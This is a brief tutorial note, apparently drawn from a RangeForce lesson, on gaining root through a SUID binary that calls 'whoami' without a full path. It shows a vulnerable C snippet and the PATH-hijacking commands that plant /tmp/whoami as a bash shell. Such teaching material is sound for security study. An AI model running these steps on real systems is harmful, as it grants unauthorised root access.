Linux privilege Escalation using the SUID Bit

If you have a executable file running root command.

rws-rwx-rwx root root

Example of a vulnerable program

setuid(0);
setgid(0);
system("whoami"); // root, but only because we set UID to 0

Exploitation

Creating a file which spawns a shell when executed:

echo "/bin/bash" > /tmp/whoami

Allowing other users to execute the file:

chmod 777 /tmp/whoami

Adding our malicious program’s directory to the PATH variable so our malicious file gets located first:

export PATH=/tmp:$PATH

If you want to, you can check the contents of the PATH variable like this:

echo $PATH

Now all we have to do is run the vulnerable SUID executable, and we will have root!

./vulnerable-program

Source

(https://materials.rangeforce.com/tutorial/2019/11/07/Linux-PrivEsc-SUID-Bit/)[https://materials.rangeforce.com/tutorial/2019/11/07/Linux-PrivEsc-SUID-Bit/]{ .md-button }